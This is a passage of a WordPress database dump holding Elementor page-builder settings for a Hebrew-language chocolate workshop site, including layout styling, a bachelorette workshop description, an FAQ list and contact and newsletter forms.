\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"71a725e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(484,113,'_elementor_version','0.4'),(488,114,'_wp_page_template','elementor_canvas'),(489,114,'_elementor_edit_mode','builder'),(490,114,'_elementor_template_type','post'),(491,114,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17359a70\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1e100444\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a7862b8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"76559f59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"57042d54\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3bf45bcb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4cc9e605\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"75f8d32a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62c4f6c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 